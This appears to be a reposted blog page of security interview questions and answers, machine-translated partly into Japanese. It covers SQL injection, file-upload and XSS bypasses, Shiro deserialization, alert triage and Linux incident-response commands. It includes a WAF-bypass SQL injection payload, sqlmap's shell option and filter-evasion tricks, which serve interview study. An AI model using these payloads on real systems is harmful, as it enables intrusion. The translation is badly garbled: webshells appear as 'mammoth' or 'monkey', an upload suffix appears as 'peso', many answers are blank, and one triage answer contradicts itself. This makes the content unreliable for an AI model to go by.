
形式:id = 1’ and/**/’1’like’2’/**//*!12345union*/select 1,2,3

質問13 : SQLインジェクションの脆弱性があるのはどのようなWeb サイトですか?

答え:

php や asp などの動的スクリプトで記述された一部の Web サイトなど、データベースと対話する Web サイト

疑似静的 Web サイトもあり、HTML Web サイトのように見えますが、実際にはデータベースと対話する動的 Web サイトです。

質問 1 4 : SQLインジェクション脆弱性の悪用が成功するための条件は何ですか?

答え:

1. 共同クエリのサポート

2. Web サイトの絶対パスを知る

3. アップロード パスによりファイルの書き込みが可能になります

4. マンモスがアップロードされると、解析して実行できます。

5. アップロード後に哺乳動物の位置を見つける機能。

質問15 : WebサイトにSQLインジェクション脆弱性があることがわかった場合それをどのようにインストールします?

答え:

手動インジェクションを通じて sqlmap をハングアップします。

質問 16:機械吊るすために使用される機能教えてください。

答案:union ,select ,into outfile

質問 17: sqlmap をハングするにはどのようなパラメータが使用されますか?

答え: --os-shell

質問18 : SQLインジェクションの脆弱性を通常どのように悪用します?

答え:

1. SQL インジェクションの脆弱性を使用してデータを読み取ります。通常はユーザー データを読み取ります。Web サイトにはバックエンドがある場合があります。

2. SQL インジェクションフックを使用してサーバー権限を直接取得します。

質問 19: SQLインジェクションの脆弱性を発見するにはどうすればよいですか?

答え:

まず、Web サイトが動的 Web サイトであるかどうかを確認し、手動挿入または sqlmap ツールを使用してスキャンします。

詳細に説明すると、マニュアル ノートでは、最初に機密文字を使用して終了文字を検索し、次にページの状態に応じて挿入モードを選択します。たとえば、結合クエリの場合、次のステップは、列と表示。Web サイトの現在のデータベースを配置し、現在のデータベース内のすべてのテーブルの名前を検索し、指定されたテーブルの下の列の名前を検索し、指定された列名の下にあるフィールドを検索します。

質問 20: SQLインジェクションの脆弱性を修正するにはどうすればよいですか?

回答:悪意のある文字と関数をフィルタリングします。

質問 21: 自己紹介をしてください

答え:

ネットワーク保護はどれくらい持続しましたか?

使用されているメーカーの検出装置: Qi'an Xintian Eye、Golden Eye Yunhua Advanced Threat Detection System

透視能力の使用

質問 1: アラームが誤報かどうかを判断するにはどうすればよいですか?

答え:

まず、このアラームを見てください。攻撃の送信元 IP (つまり、攻撃 IP) は内部 IP ですか、それとも外部 IP ですか?

1. それがイントラネット IP で、アラーム トラフィック リクエスト パケットに ipconfig、whoami などの明らかな悪意のあるリクエストがある場合、イントラネット サーバーが危険にさらされている可能性があり、その IP はただちに次のサーバーに報告されます。調査チームのメンバーは、調査および判断チームのメンバーにこの知的財産の詳細な分析を行わせてください。

イントラネット上に展開されているビジネス システムの多くは、通常のビジネス ロジック リクエストに SQL を直接組み込むなど、セキュリティ上の問題を考慮していないことが多いため、アクセスされているイントラネット システム自体のビジネス ロジックに問題がある可能性があります。デバイス ルールをトリガーしてアラームを生成します。このカテゴリは次のカテゴリに属します

誤警報があった場合には、調査・判定担当者に警報が報告され、調査・判定チームの専門家と甲の顧客は、システムに当該ビジネスロジックの問題が存在するかどうかを確認する必要がある。アラームの送信元 IP がアラームの時間帯に近いため、操作を実行しました。

2. 外部 IP の場合、比較は主に要求パケットと応答パケットのデータ内容に基づいて行われます。たとえば、要求パケットに悪意のある記述がある場合、

例えば、SQL文(バージョン選択等)を実行した場合、悪意のある攻撃と判断します。

質問 2:イントラネット マイニング アラームが表示された場合はどうすればよいですか?

答え:

イントラネット マイニング アラームやマルウェア ウイルスのほとんどはインテリジェンス ベースのアラームであり、誤報率が高く、社内従業員が大量の海賊版ソフトウェアやシステムを使用していることが原因である可能性が高いため、正確に判断することは不可能です。

ただし、ネットワークメンテナンス中は、このようなアラームは取り逃がすことがないように慎重に扱う必要があるため、調査・判定担当者に報告し、調査・判定担当者が再度検証を行う予定です。

質問 3: SQL インジェクション アラームが表示された場合攻撃成功したかどうかを判断するにはどうすればよいですか?

答え:

リクエストパケットとレスポンスパケットを比較して判断します。たとえば、要求パッケージに SQL ステートメントがあるかどうかを確認します。SQL ステートメント (バージョンの選択など) があり、応答パッケージの内容に実行成功のエコーがある (つまり、応答パッケージにデータベースのバージョンが含まれている) ) の場合、SQL インジェクション攻撃があると判断され、成功します。

質問 4:ファイルのアップロードに関するアラームが表示された場合、攻撃が成功したかどうかを判断するにはどうすればよいですか?

答え:

リクエストパケットとレスポンスパケットに基づいて比較判定を行います。まず、ステータス コード 404 のステータス コード アラームを確認します。これは最初にフィルタリングできます。応答パケットのステータス コード 200 と 302 に注目してください。次に、リクエスト パッケージ内のファイル名が悪意のあるスクリプト ファイルの名前であるかどうか、リクエスト パッケージの内容に悪意のあるスクリプト コンテンツが含まれているかどうかを確認し、応答パッケージも観察します。

質問 5:コマンド実行のアラームが表示された場合、攻撃が成功したかどうかを判断するにはどうすればよいですか?

答え:

要求パケットと応答パケットを比較して、要求パケットにシステム コマンドがあるかどうかを確認します。たとえば、要求パケットに ipconfig があるかどうかを確認します。次に、応答パケット エコーに IP 関連のコンテンツがあるかどうかを確認します。そうでない場合は、攻撃が成功したことを意味し、そうでない場合は、攻撃が成功しなかったことを意味しますが、それでも悪意のある攻撃であることに変わりはありません。

質問 6: XSSタイプアラームが表示された場合、攻撃が成功したかどうかを判断するにはどうすればよいですか?

答え:

要求パケットと応答パケットを比較して、要求パケットに挿入されたスクリプトが応答パケットに含まれているかどうかを判断します。もちろん、これだけでは攻撃が成功したかどうかを正確に判断できません。その後、応答パケットのテキストをコピーして入れます。 html サフィックスが付いたドキュメントをブラウザで開き、ポップアップ ウィンドウがあるかどうかを確認します。

質問 7: ssrf アラームが表示されても明らかな応答がない場合、攻撃が成功したかどうかをどのように判断しますか?

答え:

脆弱性検証ができれば再現検証を行います。脆弱性検証ができない場合は、ログを確認し、検出対象とのトラフィックのやり取りがないか確認し、トラフィックのやり取りがあれば攻撃は成功しているはずです。

質問 8: Sky Eye デバイスで短期間に多数のアラームが発生した場合、どのように分析を行いますか?

答え:

高リスクから低リスク、コマンド実行からディレクトリ トラバーサルなど、優先順位に基づいてフィルタリングして表示します。

質問 9: Sky Eye の誤警報率についてどう思いますか?

答え:

他のメーカーの機器と比較して、Sky Eye の誤警報率は高くなく、ほとんどのルールは比較的正確ですが、ゼロデイ攻撃を検出するのは困難です。

質問 10: Tianyanログの取得に一般的に使用される構文は何ですか?

答え:

攻撃された IP を dip dport 攻撃されたポート sip 送信元 IP

スポーツソースポート

uri リクエストデータの URL アドレス リクエストパッケージのテキストコンテンツ status レスポンスパッケージのステータスコード ホストドメイン名

質問11: Sky Eyeや交通センサーにウェブシェルマンモスの使用警告が表示されるのですが、どう対処すればよいです

答え:

1. このアラームの検証は本当に成功していますか? (成功した場合は直接レポートを発行することも可能です)

2. 失敗した場合は、攻撃者が手動で行ったのか、スキャン ツールを使用してバッチで行ったのかを判断します。

3. さらに分析するために分析プラットフォームに入り、分析プラットフォーム上の攻撃 IP にファイルのアップロード以外の攻撃があるかどうかを確認します。

トレーサビリティ:

攻撃者はどのようにして猿を書き込んだのでしょうか?

質問 12: Sky Eye またはセンサーにコマンド実行アラームが表示された場合、どのように対応すればよいですか?

答え:

1. このアラームの検証は本当に成功していますか? (成功した場合は直接レポートを発行することも可能です)

2. 失敗した場合は、攻撃者が手動で行ったのか、スキャン ツールを使用してバッチで行ったのかを判断します。

3. さらに分析するために分析プラットフォームに入り、分析プラットフォーム上の攻撃 IP にファイルのアップロード以外の攻撃があるかどうかを確認します。

4. 検出時間と攻撃動作をネットワーク保護の顧客にフィードバックする

質問 13: イ​​ントラネットIPからの攻撃を発見した場合どのように対応すべきですか?

答え:

1. まず調査チームに通知し、次にお客様と協力して他のホストが侵害されているかどうかを確認します。

2. 顧客の通常業務による誤報かどうかを確認するために顧客に通知します。

質問 14: トラフィック分析の経験の概要を教えてください。(自分置き換えると)

答え:

1. イントラネット攻撃を無視しない

2. 試行されたアラームを調査する必要がある

3. 爆発動作にも注目

4. 成功しても失敗しても、注意深くフォローアップします。

質問 15: さまざまなログ ファイル

答え:

ubuntu

Ubuntu システムのログ情報の保存パスは /var/log/ です。たとえば、次のようになります。

● auth - セキュリティ検証ログ

● ブート - 起動ログ

● kern - カーネルログ

● syslog - システムログ

● wtmp - /var/run/utmp とともに接続時間を記録します。

● Xorg - サービスログの表示

アパッチ

/var/log/auth.log (ユーザーログインログ)

緊急対応

質問 1: 緊急時の対応プロセス

答え:

一般的な緊急対応手順

対応 – ブロック – 分析 – 除去 – 強化

対応:まずインシデントの種類を判断し、次に最初のシーンを維持し、その後、お客様が許可した範囲内で情報を収集します

遮断:感染状況に応じてWebサイトをシャットダウンし、ネットワークケーブルを抜き、感染したホストを隔離しますが、お客様の業務が正常に行われている場合には、重要でないホストを遮断して挙動を観察することもできます。

分析: 主要な情報を分析し、攻撃方法を追跡します。 1. 3 つの大きなログ、サンプル、トラフィックを分析し、攻撃の動作を復元します。2. 動作に基づいて攻撃パスと攻撃プロセスを復元します。動作分析は、起動項目、起動スクリプト、プロセス、メモリなどのシステムのパフォーマンスと組み合わせた 3 つの主要コンポーネントの分析に基づいています。

クリア: D-shield または Hema を使用して WebShel を見つけてアップロードします。次に、バックドア、隠れたユーザー、起動項目、起動スクリプトやプロセスなどが存在するかどうかを確認します。

強化:状況に応じた強化、パッチの適用、システムの制限(ネットワーク分離、動作管理など)、防御装備のアップグレード、防御プロセスの改善(防御装備の配備、人員配置、ルールベースのアップグレード)

質問 2: Linux 緊急コマンド

答え:

ユーザー情報の表示

特権ユーザーを表示します。

猫/etc/passwd

シャドウ ファイルを表示します。

猫/etc/shadow

システムに他の特権ユーザーがいるかどうかを確認します。UID が 0 の場合は、root ユーザーと同じ特権ユーザーを意味します。

awk -F: '$3==0{print $1}' /etc/passwd cat /etc/passwd |grep x:0

現在ログインしているユーザーとそのログイン IP を表示します。

誰が

現在システムにログインしているユーザーと、ユーザーが実行しているプログラムを表示します。

w

現在時刻、システムの電源がオンになってからの時間、現在ログインしているユーザーの数、および過去 1 分、5 分、および 15 分間のシステムの平均負荷を確認します。

稼働時間

パスワード ファイルが最後に変更された時刻を確認します。最近変更された場合は、問題が発生している可能性があります。

stat /etc/passwd

bash シェルを使用してログインできるユーザーを確認します。

猫 /etc/passwd | grep /bin/bash

歴史的なコマンド

コマンド履歴を表示します。

歴史

履歴を保存するコマンド:

cat .bash_history >>history.txt

ポート:

netstat -記事

疑わしい外部 IP が見つかった場合は、対応する PID に基づいてそのファイル パスを見つけることができます。

ls -l /proc/pid/exe

プロセス

進行状況を確認します。

ps -aux

関連付けプロセスを確認します。

ps -aux | grep pid

CPU 使用率の上位 10 のプロセスを表示します。

ps aux --sort=pcpu | 頭 -10

启项

systemctl list-unit-files | grep enabled

定时任务

查看定时任务:

crontab -l

查看指定⽤户定时任务:

crontab -u root -l

进程监控

进程同台监控,默认根据cpu的占⽤情况进⾏排序,按B可根据内存使⽤情况排序:

top

监控指定程序:

top -p pid

静态监控:

ps -ef

host

查看host⽂件是否被篡改:

cat /etc/hosts

登陆

统计爆破主机root账号的失败次数及ip:

grep "Failed password for root" /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

查看成功登陆的⽇期,⽤户名,ip:

grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'

命令状态

查看命名修改时间,防⽌被替换:

stat /bin/netstat

获取⽂件创建时间:

获取⽂件inode号stat /⽂件名

查找⽂件所在磁盘路径:

df -h | grep ⽂件名

⽤debugfs查看⽂件的创建时间:

debugfs -R 'stat <inode号>' 磁盘路径

问题3:linux服务器被上传webshell,如何进应急

答案:

可是根据相关设备的流量告警进⾏⼿动排查。也可以使⽤D盾或者河⻢的webshell扫描

问题4:应急响应常⽤⼯

答案:

D盾,河⻢webshell查杀,微步云沙箱和微步在线

问题5:查看进程注册表的

答案:

pchunter,⽕绒剑

问题6:勒索病毒处置流程

答案:

Shiro反序列化

问题1:shiro反序列化原理

答案:

AES加密的密钥Key被硬编码在代码⾥,意味着每个⼈通过源代码都能拿到AES加密的密钥。因此,攻击者构造⼀个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段  发送。Shiro将rememberMe进⾏解密并且反序列化,最终造成反序列化漏洞

问题2:判断shiro框架

答案:

在请求包的Cookie中为remeberMe字段赋任意值  返回包中存在set-Cookie:remeberMe=deleteMe URL中有shiro字样

有时候服务器不会主动返回remeberMe=deleteMe,直接发包即可

问题3:如何判断shiro反序列化漏洞

答案:

⽤⼯具判断寻找密钥和利⽤链,⽣成报⽂,最后利⽤

举例:burpsuite仅能抓到shiroCipherKey,也就是触发shiro漏洞的秘钥,利⽤这个秘钥结合另⼀款⼯具“ShiroExploit-v2.3.jar”使⽤即可

渗透思路

问题1:件上传漏洞原理

答案:

开发⼈员未在⽂件上传点对⽂件名和⽂件内容做严格的过滤,导致⽤户可以上传恶意脚本到服务端。

问题2:件上传漏洞般上传什么?

答案:

符合⽹站语⾔环境的⼀句话、冰蝎、⼤⻢等等

質問 3:ファイルアップロードのバイパス方法

答え:

ブラックリストのバイパス、ホワイトリストのバイパス、フロントエンド検証のバイパス、ファイルコンテンツのバイパス

質問 4:ファイルをアップロードして、その Web サイトがIISサーバーであることがわかった場合、どのようなサフィックスタイプをアップロードしますか?

答え:

aspまたはaspx

質問 5: ASPスクリプトファイルをアップロードして失敗した場合、どの種類のサフィックス ファイルをアップロードしようとしますか? なぜこのような接尾辞を付けたファイルスクリプトをアップロードするのでしょうか? 

答え:

ファイル拡張子名を asa または cdx または cer に変更してアップロードしようとします。IIS サーバーはファイル拡張子拡張機能を有効にしています。

質問 6: アップロード サーバーがApacheサーバーであることがわかった場合、どのサフィックスをアップロードしようとしますか?

答え:

php

質問 7: アップロード サーバー ミドルウェアがTomcatミドルウェアであることがわかった場合、どのようなサフィックスをアップロードしようとしますか?

答え:

JSP

質問 8: アップロード サーバー ミドルウェアがWeblogicミドルウェアであることがわかった場合、どのサフィックスをアップロードしようとしますか?

答え:

JSP

質問 9: アップロード サーバーのミドルウェアがnginxであることがわかった場合、どのようなサフィックスをアップロードしようとしますか?

答え:

ペソ

问题10:件上传漏洞防护

答案:

防护:常⻅的防护措施⽐如⽂件类型可以通过⽩名单或者⿊名单进⾏判断,当⽂件上传后对⽂件进⾏重命名呀,限制上传⽂件⼤⼩呀等。

⽩名单⽐⿊名单要更安全⼀些。

XSS

问题1:XSS的集中分类

答案:

两种(反射/存储)

反射:⾮持久化,没有存⼊数据库,⽤户点击⼀下反应⼀下存储:存储在服务端数据库,属于最危险的xss代码

DOM型:通过修改DOM节点形成的XSS

持久和⾮持久的区别是什么? (会不会将攻击代码存在数据库⾥⾯)

问题2:xss原理

答案:

跨站脚本攻击,指的是攻击者往web⻚⾯插⼊恶意脚本代码,当⽤户浏览时,嵌⼊web⻚⾯⾥的脚本代码就会执⾏,从⽽达到恶意攻击⽤户的特殊⽬的

⼀般有三个⻆⾊:攻击者,⽬标服务器,受害者浏览器

问题3:xss标签(不是事件):

答案:

< script >、< img >、< input >、< details >、< svg >、< select >、< iframe >、< video >、< audio

>、< body >

问题4:xss⼤⼩写和双写都过滤了咋办:

答案:

html实体编码、url编码、可以使⽤空格.换⾏,tab键或者/**/,/*!a*/,的形式绕过关键词的检测

问题5:xss修复与防范:

答案:

过滤危险字符,输⼊⻓度限制,还有HTML实体编码等。

面试题目整理

命令

问题1:例举些常Linux命令

答案:

s:显⽰当前⽂件夹的内容

ifconfig:查看ip地址 whoami:查看⽤户

netstat:查看端⼝

ps:查看进程列表

grep:⽂件中搜索字符串

crontal:检查定时任务

问题2:例举些常Windows命令

答案:

ping:检查⽹络联通

ipconfig:查看ip地址 dir:显⽰当前⽂件夹的内容

net user:查看⽤户

netstat:查看端⼝

tasklist:查看进程列表

find:搜索⽂件中的字符串

问题3:Linux查看上户登录信

答案:

last命令 查看⽤户登录历史; 此命令会读取 /var/log/wtmp⽂件;/var/log/btmp可以显示远程登陆信息。

问题4:Linux查看最近户登陆失败的信

答案:

问题5:LinuxApache志存储位

答案:

Linux环境中Apache也就是httpd服务的启动,查看apache⽇志很简单,⽤如下命令即可:

cd /var/log/httpd/ ;

在基于Debian的Linux上,系统范围的Apache错误⽇志默认位置是/var/log/apache2/error.log。默认位置可以通过编辑Apache的配置⽂件进⾏修改。

问题6:Linux安全志存储位置Linux列出录下所有的

答案:

问题7:Linux什么命令可以控制令存活时

答案:

问题8:Linux如何查看件权限被修改的时

答案:

问题9:Windows列出所有的运服务信息命

答案:

services.msc,打开服务(本地)

net start 查看开启了哪些服务

问题10:Windows与另台机器建匿名连接的命

答案:

问题11:windows远程下载命令

答案:

Web

问题1:SQL注入

SQL的原理;

答案:

sql注⼊攻击是输⼊参数未经过滤,然后直接拼接到sql语句当中解析,执⾏恶意sql语句进⾏攻击⽬的的技术

SQL的利⽤⽅式;

答案:

SQL注⼊根据注⼊点可以分为数值型注⼊和字符型注⼊;;

根据注⼊⽅式可以分为联合注⼊,报错注⼊,布尔盲注,时间盲注,⼆次注⼊,堆叠注⼊,宽字节注⼊和HTTP Header注⼊;

报错注使的函数及原理

答案:

SQL注可能出现的场

答案:

Web⻚⾯⼀般存在SQL注⼊的业务场景为登录功能、搜索功能、商品购买、⽂件上传等与数据库有交互的场景。这些场景⼀但被SQL注⼊,则可能会导致数据库中存放的⽤户的隐私信息被泄露、⽹⻚被篡改、⽹站被挂⻢、数据库被恶意篡改、服务器被远程控制等影响

问题2:文件上传

1、件上传的原理

答案:

由于程序员在对⽤户⽂件上传部分的控制不⾜或者处理缺失⽽导致⽤户可以越过其本身权限向服务器上传可执⾏的动态脚本⽂件;

2、件上传的利⽤⽅

答案:

3、件上传功能的检测点有哪些

答案:

客户端的JS检测(主要检测⽂件名后缀)

服务端检测(MINE类型检测、⽂件后缀名、⽂件格式头)

问题3:渗透测试

渗透测试的流程;

答案:

登录⻚⾯的渗透思路;

答案:

信息收集的思路;

答案:

CDN绕过的式有哪些;

答案:

问题4:应急响应

应急响应的流程;

答案:

Linux的应急响应命令答案:

问题5:webshell

webshell具;

答案:

webshell具流量特征;

答案:

冰蝎哥斯拉流量特征 及加密式;

答案:

问题6:常见问题

1、常的端号有哪些;

答案:

Web:80; Tomcat:8080 ;Mysql:3306 ;Oracle:1521 ;MSSql:1433 ;PostgreSQL:5432 ;

SMB:445 ;FTP:21 ;SSH:22; Telnet:23;HTTPS:443 ;VNC:5900 ;RDP远程桌⾯:3389;

2、常的数据库端有哪些;

答案:

Oracle:1522; SQL Server:1433;Mysql: 3306 ;pointbase:9092;DB2:5000 ;

MongoDB:27017;Redis:6379;memcached:11211;

3、MySQL怎么查看当前数据库的版本;

答案:

在查询框⾥输⼊如下指令

SELECT VERSION();

4、mysql默认的库有哪些?

答案:

  1. information_schema;2.mysql;3.performance_schema;4.sakila;
5、window 4624是啥意思;

答案:

6、ARP协议的作是什么;ARP作在哪层;

答案:

7、防墙配置策略是什么?

答案:

8、你对https了解吗?

答案:

9、你对志系统了解吗?

答案:

10、当有志的时候,你会怎么看?

答案:

11、在防御⽅⾯有什么较擅的?

答案:

12、常的安全设备有哪些?

答案:

防⽕墙,安全中间件,授权证书系统,公开密钥基础设施,防病毒软件,蜜罐,⼊侵检测,⼊侵防御,WAF,SOC安全运营中⼼等。

13、命令执的函数有哪些?

答案:

system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open();

14、命令执怎么绕过?

答案:

管道符号绕过;空格绕过;%0a,%09;重定向绕过;变量拼接;单/双引号;编码绕过;反斜线绕过;命令换⾏绕过。

15、常的端的渗透式简单描述

答案:

FTP:21 匿名登录、爆破;

ssh:22 爆破;

Telnet:23 嗅探、爆破;

sql server:1433 弱⼝令、注⼊、爆破;

Oracle:1521 弱⼝令、注⼊、爆破;

mysql:3306 弱⼝令、注⼊、爆破;

WebLogic:7001 Java反序列化、弱⼝令;

Redis:6379 未授权访问、弱⼝令;

Jboss:8080 反序列化、弱⼝令;

16、你过哪些威胁平台

答案:

17、如果看到个告警ip,如何判断是否是真实攻击?

答案:

⾸先看下告警攻击者的ip是内⽹ip,还是外⽹ip。如果是内⽹ip,⾸先根据请求包和响应包对⽐进⾏判断。⽐ 如看下请求包内是否有sql语句,如果有sql语句(例如select version),并且响应包内容有执⾏成功的回显(就是响应包内有),那么判断确实是sql攻击。需要上报给研判⼈员,让研判⼈员跟在场的负责⼈员确认下攻击的⽬ 标业务系统是否是业务系统本身就存在这种漏洞,是否是本身的业务逻辑造成的,如果是因为本身业务逻辑造成 的并且攻击者ip确认为安全的ip,那么此攻击应当是误报。如果攻击者ip确认为不安全的ip(ip所有者说这 段 时间内没有进⾏操作),那么可能是有红队打进来了。

外⽹攻击者ip判断是否是真实攻击的话,就根据请求包和响应包内容进⾏对⽐,看下是否是恶意动作,如果是恶意动作,那么判断为真实攻击。

18、如果看到内挖矿告警怎么处理?

答案:

上报给研判⼈员,让研判⼈员进⾏分析验证。⼤部分内⽹挖矿告警,⽊⻢病毒都是基于情报的告警,误报率很⼤,但是护⽹期间需要谨慎处理,不放过任意⼀条告警;

19、如果看到sql告警,怎么判断是否是攻击成功?答案:

根据请求包和响应包对⽐进⾏判断。⽐如看下请求包内是否有sql语句,如果有sql语句(例如select version),并且响应包内容有执⾏成功的回显(就是响应包内有),那么判断确实是sql攻击;

20、如果看到件上传的告警,怎么判断是否攻击成功?

答案

根据请求包和响应包对⽐进⾏判断,看下请求包⽂件名是否是恶意的脚本⽂件名称,请求包内容是否含有恶意脚本内容,然后看下响应包状态码是否是200和302,如果符合上述两个特征,那么既有可能是上传成功。上报给研判⼈员,让研判⼈员进⾏验证。

21、如果看到条命令执的告警,怎么判断是否攻击成功?

答案:

根据请求包和响应包对⽐进⾏判断,看下请求包内是否有系统命令,⽐如看下请求包内是否有ipconfig,然后看下响应包回显是否有ip内容,如果确实有说明攻击成功,如果没有,说明攻击未成功,但是确实是恶意攻击。将此告警上报给研判⼈员,研判⼈员进⾏⼆次验证。

22、常⻅⽹⻚状态码有哪些?

答案:

● 200 - 请求成功;

● 301 - 资源(⽹⻚等)被永久转移到其它URL;

● 404 - 请求的资源(⽹⻚等)不存在;

● 500 - 内部服务器错误;

23、威胁平台根据cookie怎么判断是什么漏洞?

答案:

漏洞问题

问题1:对框架漏洞的了解?

答案:

问题2:log4j2原理和利⽤⽅

答案:由于Log4j2组件在处理程序⽇志记录时存在JNDI注⼊缺陷,未经授权的攻击者利⽤该漏洞,可向⽬标服务器发送精⼼构造的恶意数据,触发Log4j2组件解析缺陷,实现⽬标服务器的任意代码执⾏,获得⽬标服务器权限。

问题3:Apache shiro漏洞;

答案:Shiro反序列化漏洞的原理:为了让浏览器或服务器重启后⽤户不丢失登录状态,Shiro ⽀持将持久化信息序列化并加密后保存在 Cookie 的 rememberMe 字段中,下次读取时进⾏解密再反序列化。但是在 Shiro 1.2.4 版本之前内置了⼀个默认且固定的加密 Key,导致攻击者可以伪造任意的 rememberMe Cookie,进⽽触发反序列化漏洞。 判断这个漏洞的话主要看他们的响应头⾥⾯有没有rememberme;

问题4:struts2漏洞;

答案:该漏洞在两种情况下存在,第⼀,当xml配置中未设置namespace 值,且上层动作配置(action(s) configurations)中未设置或使⽤通配符namespace值时,可能导致远程代码执⾏漏洞的发⽣。第⼆,使⽤未设置 value和action值的url标签,且上层动作配置中未设置或使⽤通配符namespace值,同样可能导致远程代码执⾏。

问题5:springboot漏洞;

答案:Spring 是java web⾥⾮常常⻅的组件了, ⾃然也是研究的热⻔, 好⽤的漏洞主要是Spring Boot Actuators反序列化。

漏洞原理:

spring boot 处理参数值出错,流程进⼊ org.springframework.util.PropertyPlaceholderHelper 类中此时 URL 中的参数值会⽤ parseStringValue ⽅法进⾏递归解析其中 ${} 包围的内容都会被org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的resolvePlaceholder ⽅法当作 SpEL 表达式被解析执⾏,造成 RCE 漏洞;

问题6:常的中间件有哪些,常都有哪些相关漏洞?

答案:IIS:解析漏洞、短⽂件名枚举、远程代码执⾏、PUT漏洞;

Apache:解析漏洞、⽬录遍历、shiro反序列化漏洞;

Nginx:解析漏洞、⽬录遍历、CRLF注⼊、⽬录穿越;

Tomcat:⽰例⽬录、远程代码执⾏、反向路径遍历、war后⻔⽂件部署;

Jboss:反序列化、war后⻔⽂件部署;

web Logic:反序列化、SSRF任意⽂件上传;

问题7:常的未授权访问漏洞有哪些?

答案:Active MQ 未授权访问

Atlassian Crowd 未授权访问

CouchDB 未授权访问

Docker 未授权访问

Dubbo 未授权访问

Druid 未授权访问

Elasticsearch 未授权访问

FTP 未授权访问

Hadoop 未授权访问

JBoss 未授权访问

Jenkins 未授权访问

Jupyter Notebook への不正アクセス

Kibana への不正アクセス

Kubernetes APIサーバーへの不正アクセス

LDAP不正アクセス

MongoDB の不正アクセス

Memcached の不正アクセス

NFS不正アクセス

Rsync の不正アクセス

Redisの不正アクセス

おすすめ

転載: blog.csdn.net/m0_73896875/article/details/131583582